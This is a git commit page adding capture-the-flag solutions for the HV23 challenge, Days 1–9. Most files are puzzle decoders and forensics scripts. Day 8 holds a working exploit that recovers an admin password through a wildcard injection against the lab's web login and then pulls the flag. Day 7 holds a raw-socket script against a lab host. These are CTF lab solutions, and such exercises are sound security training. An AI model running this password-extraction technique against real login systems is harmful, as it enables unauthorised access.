Initial Commit Day 1-9

This commit is contained in:
Roman Hergenreder 2023-12-18 16:02:49 +01:00
commit 697849f63e
21 changed files with 4825 additions and 0 deletions

Binary file not shown.

32
Day 1/decode.py Normal file

@ -0,0 +1,32 @@
import string
from bs4 import BeautifulSoup
from PIL import Image
from pyzbar.pyzbar import decode
qr_size = 25
pix_size = 10
img_size = pix_size * qr_size
with open("templates/santa.j2", "r") as f:
soup = BeautifulSoup(f.read(), "html.parser")
img = Image.new("RGB", (img_size, img_size), "white")
y = 0
for c in string.ascii_lowercase:
bin_str = ""
x = 0
for e in soup.find_all("span"):
if e.text.strip() == "{{" + c + "}}":
if "a" in e["class"]:
color = (0, 0, 0)
else:
color = (255, 255, 255)
for xi in range(x, x+pix_size):
for yi in range(y, y+pix_size):
img.putpixel((xi, yi), color)
x += pix_size
y += pix_size
print("[+] Flag:", decode(img)[0].data.decode())

2
Day 1/templates/santa.j2 Normal file

File diff suppressed because one or more lines are too long

3
Day 2/decode.py Normal file

@ -0,0 +1,3 @@
data = "G d--? s+: a+++ C+++$ UL++++$ P--->$ L++++$ !E--- W+++$ N* !o K--? w O+ M-- V PS PE Y PGP++++ t+ 5 X R tv-- b DI- D++ G+++ e+++ h r+++ y+++"
# "PGP++++" -> Philip Zimmerman
print("[+] Flag: HV23{Philip Zimmerman}")

58
Day 3/decode.py Normal file

@ -0,0 +1,58 @@
data = [
["8","c","t","k","3"],
["2","r","H","V","r"],
["2","y",None,"0","v"],
["2","e","n","3","_"],
["}","3","h","{","m"],
]
def find_char(c, min=(0, 0)):
for x, row in enumerate(data):
for y, v in enumerate(row):
if v == c and (x, y) >= min:
return (x, y)
def find_key(cirb="HV23{"):
min = (0, 0)
key = []
for c in cirb:
key.append(find_char(c, min))
min = key[-1]
key[3] = (4, 1) # or (3, 3)
key.append(rotate(find_char('}'), 3)) # for final '}'
return key
def rotate(key, rotation):
rotation = rotation % 4
if rotation == 0:
return key
n = len(data) - 1
rotated = []
if isinstance(key, list):
for (x, y) in key:
rotated.append((y, n - x))
else:
rotated = (key[1], n - key[0])
if rotation > 1:
return rotate(rotated, rotation - 1)
return rotated
def get_text(key, rotation=0):
text = ""
key = list(sorted(rotate(key, rotation)))
for (x, y) in key:
text += data[x][y]
return text
key = find_key()
flag = ""
for i in range(0, 4):
flag += get_text(key, -i)
print("[+] Flag:", flag)

BIN
Day 4/bowser.elf Executable file

Binary file not shown.

26
Day 4/decode.py Normal file

@ -0,0 +1,26 @@
from hackingscripts import util
from pwn import context, disasm
import re
if __name__ == "__main__":
with open("bowser.elf", "rb") as f:
elf = f.read()
context.arch = "amd64"
offset = 0x1332
flag = b""
for instr in disasm(elf[offset:], byte=False, offset=False).split("\n"):
match = re.match(r"movabs\s+(rax|rdx),\s+0x([0-9a-f]+)", instr)
if match:
flag += util.xor(bytearray.fromhex(match[2])[::-1], 0xFF)
else:
match = re.match(r"mov\s+WORD PTR \[.*\],\s+0x([0-9a-f]+)", instr)
if match:
flag += util.xor(bytearray.fromhex(match[1])[::-1], 0xFF)
elif re.match(r"call\s+.*", instr):
break
flag = flag.split(b"\x00")[1].decode()
print("[+] Flag:", flag)

BIN
Day 5/aurora.mp4 Normal file

Binary file not shown.

47
Day 5/decode.py Normal file

@ -0,0 +1,47 @@
from PIL import Image
import os
import sys
import operator
import subprocess
import shutil
def extract_frames(destination):
os.makedirs(destination, exist_ok=True)
subprocess.run(["ffmpeg", "-i", "aurora.mp4", "frames/out-%03d.png"])
print()
def parse_frame(file):
img = Image.open(file)
pix = img.load()
return img.size, pix
if __name__ == "__main__":
output_directory = "frames"
pixel_sum = None
count = 0
extract_frames(output_directory)
for file in sorted(os.listdir(output_directory)):
if file.endswith(".png"):
sys.stdout.write(f"\rAnalyzing: {file}")
(width, height), pix = parse_frame(os.path.join(output_directory, file))
if pixel_sum is None:
pixel_sum = [[(0,0,0) for y in range(height)] for x in range(width)]
for x in range(width):
for y in range(height):
pixel_sum[x][y] = tuple(map(operator.add, pixel_sum[x][y], pix[x,y]))
count += 1
print("\nComposing new image")
img = Image.new("RGB", (width, height))
pix = img.load()
for x in range(width):
for y in range(height):
pix[x,y] = tuple(map(operator.floordiv, pixel_sum[x][y], [count] * 3))
img.save(f"result.png")
shutil.rmtree(output_directory)

BIN
Day 5/result.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 296 KiB

1
Day 6/.gitattributes vendored Normal file

@ -0,0 +1 @@
memory.raw filter=lfs diff=lfs merge=lfs -text

BIN
Day 6/cool-santa-claus.jpg Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 186 KiB

3
Day 6/extract.sh Normal file

@ -0,0 +1,3 @@
vol -f memory.raw windows.info
vol -f memory.raw windows.filescan | grep -i "png\|jpg\|jpeg"
vol -f memory.raw windows.dumpfiles --virtaddr 0x918b76c517f0

4480
Day 6/files.txt Executable file

File diff suppressed because it is too large Load Diff

3
Day 6/memory.raw Executable file

@ -0,0 +1,3 @@
version https://git-lfs.github.com/spec/v1
oid sha256:0d38311133ba9580a4bac36aee55f4f08a75f0462cc040907a179ad4b4351c87
size 2147483648

BIN
Day 6/wallpaper.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 1.6 MiB

63
Day 7/exploit.py Normal file

@ -0,0 +1,63 @@
#!/usr/bin/env python
# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
# https://git.romanh.de/Roman/HackingScripts
import os
import re
import sys
import json
import time
import base64
import requests
import subprocess
import urllib.parse
import string
from bs4 import BeautifulSoup
from hackingscripts import util, rev_shell
from hackingscripts.fileserver import HttpFileServer
import socket
from PIL import Image
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
HOST = "44c5decd-6619-4ce0-859a-882ed74f1736.rdocker.vuln.land"
IP_ADDRESS = util.get_address()
def get_image_bytes():
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((HOST, 80))
sock.sendall(b"\n")
data = b""
while True:
b = sock.recv(1024)
if not b:
break
data += b
body_offset = data.index(b"\n\n") # malformed here
header, body = data[:body_offset], data[body_offset+2:]
return header, body
if __name__ == "__main__":
header, body = get_image_bytes()
flag = ""
while body:
offset_index = body.index(b"\r\n")
chunk_size = int(body[0:offset_index], 16)
offset = offset_index + 2
chunk = body[offset:offset+chunk_size]
body = body[offset+chunk_size+2:]
if chunk_size > 0x900:
flag += chr(chunk_size & 0xFF)
print("[+] Flag:", flag)

BIN
Day 8/bask-source.zip Normal file

Binary file not shown.

85
Day 8/exploit.py Normal file

@ -0,0 +1,85 @@
#!/usr/bin/env python
# THE BASE OF THIS FILE WAS AUTOMATICALLY GENERATED BY template.py, for more information, visit
# https://git.romanh.de/Roman/HackingScripts
import string
import os
import re
import sys
import json
import time
import base64
import requests
import subprocess
import urllib.parse
from bs4 import BeautifulSoup
from hackingscripts import util, rev_shell
from hackingscripts.fileserver import HttpFileServer
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
BASE_URL = "https://a26e7e66-6235-404e-8c62-051b082e0082.idocker.vuln.land" if "LOCAL" not in sys.argv else "http://127.0.0.1:1337"
IP_ADDRESS = util.get_address()
def request(method, uri, **kwargs):
if not uri.startswith("/") and uri != "":
uri = "/" + uri
client = requests
if "session" in kwargs:
client = kwargs["session"]
del kwargs["session"]
if "allow_redirects" not in kwargs:
kwargs["allow_redirects"] = False
if "verify" not in kwargs:
kwargs["verify"] = False
if "proxies" not in kwargs:
kwargs["proxies"] = {"http":"http://127.0.0.1:8080", "https":"http://127.0.0.1:8080"}
return client.request(method, BASE_URL + uri, **kwargs)
def login(password):
while True:
# post payload is not URL decoded, so we can't use dictionary
res = request("POST", "/login", data=f"password={password}")
if "Successfully logged in" in res.text:
return True
elif "Invalid username or password!" in res.text:
return False
def retrieve_flag(cookie):
while True:
res = request("GET", "/admin", cookies={"admin_token": cookie})
util.assert_content_type(res, "text/html")
if "You are not authorized to view this page." in res.text:
return None
else:
match = re.search(r"Your flag is: (HV23\{.*\})", res.text)
if match:
return match[1]
if __name__ == "__main__":
password = "salami"
flag = retrieve_flag(password)
while flag is None:
found = False
for x in string.printable:
if x in ["*", "\\"]:
continue
if login(password + x + "*"):
password += x
found = True
flag = retrieve_flag(password)
break
if not found:
break
print("[+] Flag:", flag)

22
Day 9/decode.py Normal file

@ -0,0 +1,22 @@
import os
import re
import datetime
from bs4 import BeautifulSoup
from hackingscripts.pcap_file_extract import PcapExtractor, HttpRequest, HttpResponse
if __name__ == "__main__":
chars = []
pcap_extractor = PcapExtractor("secret_capture.pcapng")
for response in pcap_extractor:
match = re.match(r"/\?door=(\d)", response.get_file_path())
if match and isinstance(response, HttpResponse):
request = response.response_to
ip, port = request.socket.split(":")
port = int(port)
c = chr(port - 56700)
dt = datetime.datetime.strptime(response.headers["Date"], "%a, %d %b %Y %H:%M:%S %Z").timestamp()
chars.append((dt, c))
flag = "".join(entry[1] for entry in sorted(chars))
print("[+] Flag:", flag)

BIN
Day 9/secret_capture.pcapng Normal file

Binary file not shown.